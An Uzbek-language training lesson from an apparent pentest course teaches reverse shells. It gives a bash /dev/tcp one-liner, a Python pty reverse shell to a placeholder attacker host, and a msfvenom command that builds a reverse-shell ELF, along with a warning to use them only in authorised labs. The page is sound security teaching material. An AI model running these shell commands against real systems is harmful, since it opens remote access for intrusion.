Modulga qaytish0%
O'quv darsi / Exploitation va Post-Exploitation
Reverse shell
Maqsaddan bizga ulanuvchi shell — firewall'ni aylanib o'tish texnikasi.
25 daq.ilg'or3 komanda1/4
Maqsadlar
- Bash, python, nc payload'lar
- msfvenom bilan generatsiya
Faqat ruxsat etilgan muhitda mashq qiling
Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.
Komandalar
Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.
$
bash -i >& /dev/tcp/ATTACKER/4444 0>&1$
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'$
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.5 LPORT=4444 -f elf -o shell.elf